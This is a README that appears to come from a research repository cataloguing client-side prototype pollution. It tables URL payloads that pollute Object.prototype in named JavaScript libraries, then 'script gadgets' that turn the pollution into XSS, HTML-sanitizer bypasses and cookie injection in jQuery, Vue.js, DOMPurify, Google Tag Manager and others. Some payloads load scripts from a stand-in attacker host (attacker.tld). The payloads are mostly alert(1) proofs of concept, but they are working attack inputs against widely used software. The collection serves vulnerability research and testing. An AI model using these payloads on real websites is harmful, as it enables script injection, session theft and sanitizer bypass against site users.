If you are unfamiliar with Prototype Pollution Attack, you should read the following first:
-
Amazing work by s1r1us and team by S1r1us
-
JavaScript prototype pollution attack in NodeJS by Olivier Arteau
-
Prototype pollution – and bypassing client-side HTML sanitizers by Michał Bentkowski
-
Special thankx to Sergey Bobrov - Black2fan and all others mentioned below for info concat, posix which introduced an interesting technique to achieve RCE in the template engines, Michal Bentkowski showed bypassing client-side HTML sanitizers and William Bowling's found a Reflected XSS on HackerOne using prototype pollution.
-
A lot of people are involved in this work, it was really a great experience working with these super awesome people.
From RCE to SQL, any vulnerability is possible with the prototype pollution in the javascript application.
In this repository, we're trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location parsing and useful script gadgets that can be used to demonstrate the impact.
| Name | Payload | Refs | Found by |
|---|---|---|---|
| Wistia Embedded Video (Fixed) | ?__proto__[test]=test?__proto__.test=test |
[1] | William Bowling |
| jQuery query-object plugin CVE-2021-20083 |
?__proto__[test]=test#__proto__[test]=test |
Sergey Bobrov | |
| jQuery Sparkle CVE-2021-20084 |
?__proto__.test=test?constructor.prototype.test=test |
Sergey Bobrov | |
| V4Fire Core Library | ?__proto__.test=test?__proto__[test]=test?__proto__[test]={"json":"value"} |
Sergey Bobrov | |
| backbone-query-parameters CVE-2021-20085 |
?__proto__.test=test?constructor.prototype.test=test?__proto__.array=1|2|3 |
[1] | Sergey Bobrov |
| jQuery BBQ CVE-2021-20086 |
?__proto__[test]=test?constructor[prototype][test]=test |
Sergey Bobrov | |
| jquery-deparam CVE-2021-20087 |
?__proto__[test]=test?constructor[prototype][test]=test |
Sergey Bobrov | |
| MooTools More CVE-2021-20088 |
?__proto__[test]=test?constructor[prototype][test]=test |
Sergey Bobrov | |
| Swiftype Site Search (Fixed) | #__proto__[test]=test |
[1] | s1r1us |
| CanJS deparam | ?__proto__[test]=test?constructor[prototype][test]=test |
Rahul Maini | |
| Purl (jQuery-URL-Parser) CVE-2021-20089 |
?__proto__[test]=test?constructor[prototype][test]=test#__proto__[test]=test |
Sergey Bobrov | |
| HubSpot Tracking Code (Fixed) | ?__proto__[test]=test?constructor[prototype][test]=test#__proto__[test]=test |
Sergey Bobrov | |
| YUI 3 querystring-parse | ?constructor[prototype][test]=test |
Sergey Bobrov | |
| Mutiny (Fixed) | ?__proto__.test=test |
SPQR | |
| jQuery parseParams | ?__proto__.test=test?constructor.prototype.test=test |
POSIX | |
| php.js parse_str | ?__proto__[test]=test?constructor[prototype][test]=test |
POSIX | |
| arg.js | ?__proto__[test]=test?__proto__.test=test?constructor[prototype][test]=test#__proto__[test]=test |
POSIX | |
| davis.js | ?__proto__[test]=test |
POSIX | |
| Component querystring | ?__proto__[NUMBER]=test?__proto__[123]=test |
Masato Kinugawa | |
| Aurelia path | ?__proto__[test]=test |
[1] | s1r1us |
| analytics-utils < 1.0.3 | ?__proto__[test]=test?constructor[prototype][test]=test |
[1] | alexdaviestray |
| Name | Payload | Impact | Refs | Found by |
|---|---|---|---|---|
| Wistia Embedded Video | ?__proto__[innerHTML]=<img/src/onerror%3dalert(1)> |
XSS | [1] | William Bowling |
| jQuery $.get | ?__proto__[context]=<img/src/onerror%3dalert(1)>&__proto__[jquery]=x |
XSS | Sergey Bobrov | |
| jQuery $.get >= 3.0.0 Boolean.prototype |
?__proto__[url][]=data:,alert(1)//&__proto__[dataType]=script |
XSS | Michał Bentkowski | |
| jQuery $.get >= 3.0.0 Boolean.prototype |
?__proto__[url]=data:,alert(1)//&__proto__[dataType]=script&__proto__[crossDomain]= |
XSS | Sergey Bobrov | |
| jQuery $.getScript >= 3.4.0 | ?__proto__[src][]=data:,alert(1)// |
XSS | s1r1us | |
| jQuery $.getScript 3.0.0 - 3.3.1 Boolean.prototype |
?__proto__[url]=data:,alert(1)// |
XSS | s1r1us | |
| jQuery $(html) | ?__proto__[div][0]=1&__proto__[div][1]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
| jQuery $(x).off String.prototype |
?__proto__[preventDefault]=x&__proto__[handleObj]=x&__proto__[delegateTarget]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
| jQuery $(x).attr | ?__proto__[OnError]=alert(1)&__proto__[SRC]=fakeimagewontload.jpg |
XSS | [1] [2] | Johan Carlsson |
| jQuery $(x).on, $(x).submit | ?__proto__[handler][]=x&__proto__[selector][]=<img/src/onerror%3Dalert(1)>&__proto__[focus]=x&__proto__[needsContext]=x |
XSS | [1] | Johan Carlsson |
| Google reCAPTCHA | ?__proto__[srcdoc][]=<script>alert(1)</script> |
XSS | s1r1us | |
| Twitter Universal Website Tag (Fixed) | ?__proto__[hif][]=javascript:alert(1) |
XSS | Sergey Bobrov | |
| Tealium Universal Tag | ?__proto__[attrs][src]=1&__proto__[src]=data:,alert(1)// |
XSS | Sergey Bobrov | |
| Akamai Boomerang | ?__proto__[BOOMR]=1&__proto__[url]=//attacker.tld/js.js |
XSS | s1r1us | |
| Lodash <= 4.17.15 | ?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1) |
XSS | [1] | Alex Brasetvik |
| sanitize-html | ?__proto__[*][]=onload |
Bypass | [1] | Michał Bentkowski |
| sanitize-html | ?__proto__[innerText]=<script>alert(1)</script> |
Bypass | [1] | Hpdoger |
| js-xss | ?__proto__[whiteList][img][0]=onerror&__proto__[whiteList][img][1]=src |
Bypass | [1] | Michał Bentkowski |
| DOMPurify <= 2.0.12 | ?__proto__[ALLOWED_ATTR][0]=onerror&__proto__[ALLOWED_ATTR][1]=src |
Bypass | [1] | Michał Bentkowski |
| DOMPurify <= 2.0.12 | ?__proto__[documentMode]=9 |
Bypass | [1] | Michał Bentkowski |
| Google Closure | ?__proto__[*%20ONERROR]=1&__proto__[*%20SRC]=1 |
Bypass | [1] | Michał Bentkowski |
| Google Closure | ?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)// |
XSS | [1] | Michał Bentkowski |
| Marionette.js / Backbone.js | ?__proto__[tagName]=img&__proto__[src][]=x:&__proto__[onerror][]=alert(1) |
XSS | Sergey Bobrov | |
| Adobe Dynamic Tag Management | ?__proto__[src]=data:,alert(1)// |
XSS | Sergey Bobrov | |
| Adobe Dynamic Tag Management | ?__proto__[SRC]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
| Swiftype Site Search | ?__proto__[xxx]=alert(1) |
XSS | s1r1us | |
| Embedly Cards | ?__proto__[onload]=alert(1) |
XSS | Guilherme Keerok | |
| Segment Analytics.js | ?__proto__[script][0]=1&__proto__[script][1]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
| Knockout.js Array.prototype |
?__proto__[4]=a':1,[alert(1)]:1,'b&__proto__[5]=, |
XSS | Michał Bentkowski | |
| Zepto.js | ?__proto__[onerror]=alert(1) |
XSS | [1] | lih3iu |
| Zepto.js | ?__proto__[html]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
| Sprint.js | ?__proto__[div][intro]=<img%20src%20onerror%3dalert(1)> |
XSS | [1] | lih3iu |
| Vue.js | ?__proto__[v-if]=_c.constructor('alert(1)')() |
XSS | POSIX | |
| Vue.js | ?__proto__[attrs][0][name]=src&__proto__[attrs][0][value]=xxx&__proto__[xxx]=data:,alert(1)//&__proto__[is]=script |
XSS | [1] | s1r1us |
| Vue.js | ?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')() |
XSS | [1] | r00timentary |
| Vue.js | ?__proto__[data]=a&__proto__[template][nodeType]=a&__proto__[template][innerHTML]=<script>alert(1)</script> |
XSS | [1] | SuperGuesser |
| Vue.js | ?__proto__[props][][value]=a&__proto__[name]=":''.constructor.constructor('alert(1)')()," |
XSS | [1] | st98_ |
| Vue.js | ?__proto__[template]=<script>alert(1)</script> |
XSS | [1] | huli |
| Demandbase Tag | ?__proto__[Config][SiteOptimization][enabled]=1&__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php? |
XSS | SPQR | |
| @analytics/google-tag-manager | ?__proto__[customScriptSrc]=//attacker.tld/xss.js |
XSS | SPQR | |
| i18next | ?__proto__[lng]=cimode&__proto__[appendNamespaceToCIMode]=x&__proto__[nsSeparator]=<img/src/onerror%3dalert(1)> |
Potential XSS | Sergey Bobrov | |
| i18next < 19.8.5 | ?__proto__[lng]=a&__proto__[a]=b&__proto__[obj]=c&__proto__[k]=d&__proto__[d]=<img/src/onerror%3dalert(1)> |
Potential XSS | Sergey Bobrov | |
| i18next >= 19.8.5 | ?__proto__[lng]=a&__proto__[key]=<img/src/onerror%3dalert(1)> |
Potential XSS | Sergey Bobrov | |
| Google Analytics | ?__proto__[cookieName]=COOKIE%3DInjection%3B |
Cookie Injection | Sergey Bobrov | |
| Popper.js | ?__proto__[arrow][style]=color:red;transition:all%201s&__proto__[arrow][ontransitionend]=alert(1)?__proto__[reference][style]=color:red;transition:all%201s&__proto__[reference][ontransitionend]=alert(2)?__proto__[popper][style]=color:red;transition:all%201s&__proto__[popper][ontransitionend]=alert(3) |
XSS | [1] [2] | Matheus Vrech |
| Pendo Agent | ?__proto__[dataHost]=attacker.tld/js.js%23 |
XSS | Renwa | |
| script.aculo.us String.constructor |
?x=x&x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror%3dalert(1)> |
XSS | Sergey Bobrov | |
| hCaptcha (Fixed) | ?__proto__[assethost]=javascript:alert(1)// |
XSS | Masato Kinugawa | |
| Google Closure | ?__proto__[trustedTypes]=x&__proto__[emptyHTML]=<img/src/onerror%3dalert(1)> |
XSS | Mathias Karlsson | |
| Google Tag Manager | ?__proto__[vtp_enableRecaptcha]=1&__proto__[srcdoc]=<script>alert(1)</script> |
XSS | terjanq | |
| Google Tag Manager | ?__proto__[q][0][0]=require&__proto__[q][0][1]=x&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7 |
XSS | Sergey Bobrov / Masato Kinugawa |
|
| Google Analytics | ?__proto__[q][0][0]=require&__proto__[q][0][1]=x&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7 |
XSS | Sergey Bobrov / Masato Kinugawa |